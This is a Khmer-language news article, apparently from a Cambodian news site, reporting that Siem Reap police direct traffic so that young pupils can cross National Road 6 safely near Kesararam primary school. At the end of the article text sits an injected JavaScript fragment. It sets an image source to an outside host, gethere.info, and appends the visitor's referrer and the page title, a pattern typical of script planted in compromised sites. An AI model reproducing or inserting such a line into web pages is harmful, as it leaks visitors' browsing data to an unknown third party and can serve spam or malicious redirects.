បញ្ហាសុវត្ថិភាពចំពោះក្មួយៗសិស្សានុសិស្សត្រូវបានកម្លាំងនគរបាលខេត្តសៀមរាបយកចិត្តទុកដាក់ខ្ពស់

សៀមរាប៖ក្រោមការដឹកនាំរបស់លោកឧត្តមសេនីយ៍ទោ សត ណាឌី ស្នងការនគរបាលខេត្តសៀមរាបតែងតែយកចិត្តទុកដាក់ចំពោះបញ្ហាចរាចរណ៍សំរាប់សិស្សសាលាតូចៗដែលមកចូលរៀន និងចេញពីរៀនត្រឡប់ទៅផ្ទះវិញ ដែលឆ្លងកាត់កន្លែង អាចបណ្ដាលឲ្យមានគ្រោះថ្នាក់ដល់អាយុជីវត។ ដោយមើលឃើញពីបញ្ហានេះហើយ លោកឧត្តមសេនីយ៍ស្នងការនគរបាលខេត្ត បានដាក់ចេញនូវផែនការដល់កងកម្លាំងនគរបាលទាំងអស់ចំណុះឲ្យស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប ត្រូវតែបន្តសម្រួលចរាចរណ៍ដល់ក្មួយៗសិស្សានុសិស្សតូចៗបន្ថែមទៀត នៅក្នុងមូលដ្ឋាន ឫក៏ភូមិសាស្រ្តដែលខ្លួនគ្រប់គ្រោងរៀងរាល់ថ្ងៃឲ្យបានល្អប្រសើរ ជៀសវាងកុំឲ្យមានករណីគ្រោះថ្នាក់ចរាចរណ៍កើតឡើងទៅលើក្មួយតូចៗដែលនាំឲ្យមានការសោកស្ដាយនៅពេលក្រោយ។ ជាក់ស្តែងនៅព្រឹកថ្ងៃទី១០ ខែសីហា ឆ្នាំ២០១៦ នេះលោកវរសេនីយ៍ទោ ជឹម សុវណ្ណ នាយការិយាល័យនគរបាលចរាចរណ៍ផ្លូវគោក ជាតំណាងលោកវរសេនីយ៍ឯក តេង ចាន់ណាត ស្នងការរង ជាប្រធានការិយាល័យនគរបាលកណ្ដាលចរាចរណ៍ នៃស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប បានចាត់កម្លាំងនៅក្រោមឱវាទបន្តចុះជួយសម្រួលចរាចរណ៍ដល់សិស្សានុសិស្សាតូចៗ នៃសាលាបឋមសិក្សា កេសរារាម ដែលមានទីតាំងនៅតាមបណ្ដោយផ្លូវជាតិលេខ៦ ស្ថិតនៅភូមិសាលាកន្សែង សង្កាត់ស្វាយដង្គុំ ក្រុង-ខេត្តសៀមរាប នៅពេលដែលក្មួយៗសិស្សានុសិស្សចេញពីសាលារៀនទៅផ្ទះវិញ និងសិស្សដែលចូលរៀននៅពេលថ្ងៃផងដែរ។ លោកវរសេនីយ៍ទោ ជឹម សុវណ្ណ នាយការិយាល័យនគរបាលចរាចរណ៍ផ្លូវគោកខេត្តសៀមរាប បានឲ្យដឹងថា នៅពេលដែលជិតដល់ម៉ោងសិស្សសាលាចូលរៀន និងចេញពីសាលារៀនត្រឡប់ទៅលំនៅដ្ឋានវិញ លោកតែងតែបានដាក់កម្លាំងសម្រាប់ជួយសម្រួលចរាចរណ៍ដល់ក្មួយៗសិស្សសាលាដែលបានធ្វើដំណើរឆ្លងកាត់ផ្លូវជាតិលេខ៦ ក្នុងក្រុងសៀមរាបជារៀងរាល់ថ្ងៃ មិនថាតែសាលាកេសរារាមនោះទេ ហើយថែមទាំងមិនអនុញ្ញាតិឲ្យរថយន្ត ឫម៉ូតូឆ្លងកាត់នៅពេលដែលសិស្សាសាលាឆ្លងកាត់ទៀតផង ដើម្បីបញ្ជៀសកុំឲ្យមានគ្រោះថ្នាក់ចរាចរណ៍កើតឡើងជាយថាហេតុ។នេះសរបញ្ជាក់ឲ្យឃើញថា កងកម្លាំងនគរបាលរបស់យើងយកចិត្តទុកដាក់ចំពោះបញ្ហាសុវត្ថិភាពរបស់ក្មួយៗសិស្សានុសិស្ស និងបង្កើតភាពកក់ក្ដៅចំពោះមាតា បិតា អាណាព្យាបាលសិស្ស ក៏ដូចជាលោកគ្រូ អ្នកគ្រូផងដែរ។ images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More